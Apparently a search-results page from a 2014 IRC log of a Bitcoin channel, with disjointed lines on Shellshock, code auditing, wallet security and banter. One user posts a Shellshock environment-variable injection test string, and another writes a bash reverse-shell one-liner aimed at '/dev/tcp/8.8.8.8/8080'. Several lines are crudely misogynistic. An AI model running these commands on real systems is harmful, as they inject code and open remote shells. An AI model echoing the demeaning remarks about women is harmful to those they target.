log☇︎
214000+ entries in 1.538s
asciilifeform: and not by a pair of hands attached to a sniveling shill
asciilifeform: i vaguely recall that mr. hearbleed was a pedigreed вредитель though.
asciilifeform: so when do we get to see a public and fleshy punishment of author ?
mircea_popescu: Transcript for 24-09-2014, 1337 lines <<< we've done it, everyone. i hereby call the end of the #b-a party. thanks for all the lines, it's been a hoot etc!
mircea_popescu: lobbes: and the paper wasn't even peer reviewed << in that guy's case, peers can be a misnomer :p
asciilifeform: and what's a 'ria' ?
mircea_popescu: maybe. still, a lot can be done until one runs into such walls.
mircea_popescu: in a security environment, security is auditable provided the comittment to security is not compromised in order to listen to some ziggler impersonator.
mike_c: gee, every single one of my ec2 servers is scheduled for a reboot now.
mircea_popescu: doctors have been doing ok auditing the human body w/o any spec for a while now.
mircea_popescu: TomServo: Would an audit even be useful without a specification? << perhaps, yes.
mircea_popescu: ThickAsThieves: is there a trustworthy wot-signed document of an auditor saying any version of bitcoin is safe? << the most there is is me going on the record that .6.* is probably okay.
mircea_popescu: which has like a picture on it and that's that.
mircea_popescu: they have a specially printed bag
mircea_popescu: not even a keyid.
mike_c: not even a keyid?
mircea_popescu: mike_c it's a very large hole. odds of no pencildick managing to find it, ever... hm
mircea_popescu: i also quoted a test for 6271 yest.
Naphex: mircea_popescu: its a stupid check lol
mircea_popescu: export badvar='() { (a)=>\';bash -c "hackerfile echo vulnerable";grep vulnerable hackerfile||echo safe << if anyone wants to test it
kuzetsa: the initial "fix" was for a parsing flaw described in CVE-2014-6271 (shellshock) which a lot of distros patched but then didn't get CVE-2014-7169 as well (a different type of issue with bash)
mircea_popescu: kuzetsa a yea nm.
asciilifeform: unless you can actually build 'borg' that share a mind, rather than just army or clan, the organization cannot understand mechanisms too large for the cleverest member to understand. for any useful value of 'understand.'
mircea_popescu: ThickAsThieves: i often think about that, how the hell can someone who cannot/willnot read code, ever be the steward of a software project safely? <<< you know i don't actually read all that much code at all. i guess i could, more or less, but i wouldn't trust myself to understand it. by which i don't mean "what it does", but i do mean "what we can absolutely say about this program"
kuzetsa: Naphex: yeah, I decided to compile a new kernel anyway so I rebooted after making sure bash was patched :)
mircea_popescu: how is it done ? why, by not acting towards a goal, but from a cause.
asciilifeform: one can chop heads if job is not done, but if it isn't doable given the available constraints - you just end with a tall pile of heads
asciilifeform: until the entire machine stack (chemical, electronic, os, etc) fits in a human mind - doesn't have to be that of alcoholic bum off the street, could be six people alive - then you have a system a reasonable man will sign his life under.
mircea_popescu: we're not here for a goal, we're here because a cause. major fucking difference.
asciilifeform: also it is possible that i used a bad example. man has indeed invented hydrogen bomb. but securing 50 years of turdolade by 'fixing mistakes' is more akin to jumping 1km. no athlete has jumped 1km, and beatings will not create one.
mike_c: if i wrote a new btc wallet (or managed development thereof), it would be secure for fear of above methods
mircea_popescu: you, in fact, are currently and have been for a year, molding a bullet.
mircea_popescu: if in a worldwide septic tank, we're going for it.
mircea_popescu: if he says this sitting right next to a lathe i'm going to smack his head on the lathe.
asciilifeform: context of 'i need a box of bullets'
asciilifeform: russian saying 'you can't mold a bullet from shit' isn't strictly true - you could, had you sufficient energy, convert the shit into diamond and have bullet
asciilifeform: mircea_popescu: different gedankenexperiment. take redditgurlz, say a dozen. lock them in a dungeon, no food until invent hydrogenbomb.
mircea_popescu: unless a meteor falls, they're coming home with 10 kids.
mircea_popescu: you don't need round stones to produce round stones. you just need a rotative process.
asciilifeform: so you end up with a sub-wot for this that's 100 percent scammer by weight.
asciilifeform: mircea_popescu: the basic problem is that anyone who tells you that he can do this job - is a liar, right off the bat
mircea_popescu: the reason airbus is a thing is because the romans forced men to push oars.
mircea_popescu: once the "you have one chance, don't fuck it up" model gets implemented universally, we'll have a wholesale return to the pleasant mores of the society constructed on enforcing the same principle upone women only.
mircea_popescu: he lives in a world where being a scummy fuckwit is okay, because everyone is a scummy fuckwit.
mircea_popescu: consider the culture shock a certain justin o'connell endured at my hands : http://trilema.com/2014/so-the-dollar-vigilante-scam-ring-is-going-to-jail/#comment-108121
mircea_popescu: jurov: redhat would be in a position to do it << redhat is a usg subcontractor. this is like saying goldman sachs is in a position to break the aml/kyc bullshit ring.
asciilifeform: mircea_popescu: code auditing without a serious 'poison pill contract' turns into 'elephant repellant.'
mircea_popescu: so if your per line price can be few enough satoshi, this is a valid business model.
mircea_popescu: jurov: is anyone willing to pay "we have read the code for you" kind of security? <<< yes. but it's like the case with drinking water : people ARE wiling to pay for drinking water ; people are not willing to pay to have a dam constructed.
kuzetsa: Naphex, asciilifeform: yeah... I've had to stop neglecting a production server and finally run updates today because of shellshock :(
mircea_popescu: wywialm no, you're right, it's just... it's a fundamental idea that saw much expression.
mircea_popescu: for that matter, it's a direct pastiche of knight, “You cannot fix a machine by just power-cycling it with no understanding of what is going wrong.”
mircea_popescu: which is why you can have good programmers that speak english, russian or whatever else natively, as well as c or lisp or whatever else ; but you can't make someone a good programmer by teaching him to say i++;
mircea_popescu: this is exactly the case in here. to imagine one can somehow magically learn "the language" without a) passing the requisite tests and b) interiorising the culture that spawned that language is naive. and if a and b is satisfgied, the form of language is really moot anyway.
mircea_popescu: ing even may be an excessive requirement. if on the other hand in a room with a woman that doesn't want to, you can be e a poe for all the good it'll do you.
mircea_popescu: bounce: now it would help if we can properly articulate what ails us. but we can't, because the terminology has been deliberately confused and watered down and broadened and stretched (by the industry) so as to spread FUD more effectively << you are very naive to imagine the terminology has anything to do with it. point in case : if in a room with a woman that wants to fuck me, i don't need to speak her language. point
asciilifeform: (who, of late, have actually been selling a computer in that shape.)
mircea_popescu: since they can't find a sponge that comfortably fits a calender
mircea_popescu: the feminist is a 650 lb mountain dew and icecream behemoth with a very popular twitter profile, and a lot of lj experience.
mircea_popescu: asciilifeform the guy is a 65 lb environmentalist vegan artist with a lot of etsy success, on lesswrong and patronize or w/e that donation site is.
mircea_popescu: bounce: VERY DANGEROUS UBERHACKERS << ever see a woman with a little girl trying to cook while the little girl stirred some random items in a smaller pot immitating her ?
mircea_popescu: and it'll have a funny little moustache.
mircea_popescu: and they'll probably meet, and have a child.
mircea_popescu: ThickAsThieves: they wanna jedi mind trick the fappening and NSA etc << there's probably a feminst and an environmentalist somewhere in the us that actually will buy into it.
mircea_popescu: "Username/password combinations don’t cut it anymore, and Two-Factor authentication is a great way to help secure user accounts. If you have an account with a system that supports it, you should be using it."
Naphex: could've just used a reverse echo "code" >& /dev/tcp/8.8.8.8/8080 0>&1
Naphex: what a stupid payload to even ping back
asciilifeform: (fingers were already published, for anyone who needs my fingertips to unlock a nuke or whatever)
asciilifeform: ;;later tell ben_vulpes puzzle, because am n00b: http://imgur.com/a/JggcG << why does parting tool produce a spiral finish? and what determines the geometry of the spiral?
gribble: Error: "titlasers" is not a valid command.
jurov: ;;titlasers should be a thing
chetty: you need an airplane to discover a house?
bounce: of course they /could/ have done all that with ordinary planes, except rules. there's no rules for this yet, so some enterprising clerk or other can just order renting such a thing out of the petty cash.
kakobrekla: but combine the both and you get a selling sensation
asciilifeform: it is really a unique sort of retardation when people pretend like airplane was just invented now.
rithm: i've been thinking bitpay's bowl gam sponsorship was a play to get bitcoin in ncaaa stadiums
rithm: The Love Will team presented students with information about Bitcoin transactions, mobile hot wallets, and rolled out their new ‘Jacket Wallet’, a customized Pheeva hot wallet, specifically for Georgia Tech students and faculty, available on android and in the app store soon. The team plans to create this type of customized wallet at every university that begins to accept Bitcoin on campus.
mircea_popescu: either someone on the ground here pulled a practical joke at the "media" expense, or else us folk running off to argentina is becoming a problem for the minitruth
ThickAsThieves: every good backdoor has a backdoor
nubbins`: so apparently they found a backdoor in the shellshock patch on github, hey?
mircea_popescu: they didn't understand there's a mp. it hurt. won't repeat mistakes next time.
mats_cd03: my principle concern is getting to 1000btc. i don't know if it can be done, at the current rate of career progression... i need a better job.
mircea_popescu: "pay us money, you get a facemorph of all the people in your demo."
mircea_popescu: ThickAsThieves: it's not a real man, it's face morph of all the men in their target audience <<< this. it's probably the real point of facebook.
mircea_popescu: and if you can't find people who work like that, you're not in a good country to do business, quit the bezzlathron and move.
asciilifeform: likely, some bozo found (and used) a xen 'vm escape.'
mircea_popescu: mats_cd03: but every contractor in the world is a miserable, lying thief. << because you pay upfront.
mircea_popescu: kakobrekla: barely over retard. <<< nah you're just too young to have a clear memory of the 90s :D
ThickAsThieves: give it a couple weeks
mats_cd03: also, if you are poor or need superior treatment in a pinch, go to a va or teaching hospital.
nubbins`: probably just a celica w/ a body kit or something
ThickAsThieves: is it really a fancy car? looks like a toy
nubbins`: tat that's a pretty fancy car to be crashing into a rock face
bounce: also, I'll peer review your paper in return for a couple subs
mats_cd03: http://www.armytimes.com/article/20140923/NEWS08/309230066/Army-chief-Division-headquarters-will-deploy-soon-Iraq >> 1st Armored. give it a month before the dudes in kuwait make their way over. so much for leaving iraq...
nubbins`: i'm going to submit a paper about how submarine sandwiches don't exist
kakobrekla: tat a pimp nao
ben_vulpes: ThickAsThieves: honestly it's a play to get some time to read the code and fuck around with tests before clients start asking for features.
jurov: in half a day i made it actually talk to altcoind (altcoiners, watch your .altcoin/debug.log ;) )
mike_c: i am a fan of the security bug bounties (if they are sizable). gives hackers a way to do their thing and get paid legally.